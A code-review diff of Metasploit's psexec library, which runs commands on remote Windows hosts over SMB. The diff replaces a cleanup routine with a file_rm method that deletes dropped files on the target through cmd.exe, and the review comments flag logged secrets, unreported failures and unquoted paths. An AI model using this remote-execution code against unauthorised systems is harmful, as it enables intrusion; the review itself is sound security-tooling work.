diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb
index e31a6a68c1..7e8b030564 100644
--- a/lib/msf/core/exploit/psexec.rb
+++ b/lib/msf/core/exploit/psexec.rb
@@ -12,6 +12,7 @@ module Exploit::Remote::Psexec
 include Msf::Exploit::Remote::DCERPC
 include Msf::Exploit::Remote::SMB
+ include Msf::Exploit::FileDropper
 # Retrieves output from the executed command
 #
@@ -47,7 +48,7 @@ module Exploit::Remote::Psexec
 # @param command [String] Should be a valid windows command
 # @return [Boolean] true if everything wen't well
 def psexec(command)
-
+ print_status("#{peer} - Executing: #{command}")
 simple.connect("IPC$")
 handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
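Review bot: The added `print_status` in `psexec` echoes the full command string on every call, and because `file_rm` in the third hunk also goes through `psexec`, each file cleanup now prints this line in addition to its own "Deleting" message. Command strings passed to this method may carry credentials or long encoded payloads (the callers are not visible here), and those would then land in console output and any saved logs. Consider `vprint_status("#{peer} - Executing: #{command}")` so the echo appears only in verbose mode. The body of `psexec` continues outside the hunk.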
@@ -157,34 +158,20 @@ module Exploit::Remote::Psexec
 return true
 end
- # This is the cleanup method, removes .txt and .bat file/s created
- # during execution
- #
- # @example
- # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat')
- #
- # @param smbshare [String] The SMBshare to connect to. Usually C$
- # @param ip [String] IP address of remote host to connect to
- # @param text [String] Path to the text file relative to the smbshare
- # @param bat [String] Full path to the batch file created
- # @return [StandarError] only in the event of an error
- def cleanup_after(smbshare, ip, text, bat)
- begin
- # Try and do cleanup command/s
- cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}"
- print_status("#{peer} - Executing cleanup...")
- psexec(cleanup)
- if !check_cleanup(smbshare, ip, text)
- print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.")
- else
- print_status("#{peer} - Cleanup was successful")
- end
- rescue StandardError => cleanuperror
- print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}")
- print_error("#{peer} - Make sure to manually remove files from the target")
- return cleanuperror
- end
- end
+ # This method is called by file_dropper to remove files droped
+ # By your module
+ #
+ # @example
+ # file_rm('C:\WINDOWS\Temp\output.txt')
+ #
+ # @param file [String] Full path to a file on the remote host
+ # @return [StandardError] only in the event of an error
+ def file_rm(file)
+ delete = "%COMSPEC% /C del #{file}"
+ print_status("#{peer} - Deleting #{file}")
+ psexec(delete)
+ print_status("#{peer} - Command Ran")
+ end
 # Make sure the cleanup command worked
 # This method should only be called from within cleanup_after
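Review bot: `file_rm` ignores the result of `psexec(delete)` and always prints "Command Ran", so a failed delete is reported exactly like a successful one, and the removed `cleanup_after` warning to remove files from the target manually has no replacement. `psexec` is documented earlier in this file as returning a Boolean, so its result can drive the message: `print_error("#{peer} - Unable to delete #{file}, remove it manually") unless psexec(delete)`. The path is also interpolated unquoted, so a path containing spaces or `&` is split or reinterpreted by cmd.exe; `delete = "%COMSPEC% /C del \"#{file}\""` avoids that. The `@return [StandardError]` line does not match the body, which rescues nothing, and the trailing context comment on the next method still refers to `cleanup_after`, which this hunk deletes.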